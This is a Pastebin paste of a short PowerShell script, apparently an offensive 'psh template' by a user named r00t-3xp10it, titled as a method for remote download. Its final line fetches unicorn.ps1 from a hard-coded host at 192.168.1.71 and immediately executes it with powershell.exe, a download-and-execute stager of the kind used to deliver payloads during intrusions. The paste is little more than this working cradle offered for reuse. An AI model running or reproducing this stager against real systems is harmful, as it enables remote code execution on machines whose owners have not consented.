r00t-3xp10it

Invoke-WebRequest.ps1

Mar 14th, 2018
478
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #
  2. # psh template | Author r00t-3xp10it
  3. #
  4. Write-Host "Additional Methods for Remote Download" -ForeGroundColor green -BackGroundColor black
  5. Write-Host "   Invoke-WebRequest (r00t-3xp10it)   " -ForeGroundColor red -BackGroundColor white
  6. Invoke-WebRequest "http://192.168.1.71/unicorn.ps1" -OutFile "unicorn.ps1" -PassThru; Start-Sleep 1; powershell.exe -File unicorn.ps1
Advertisement
Add Comment
Please, Sign In to add comment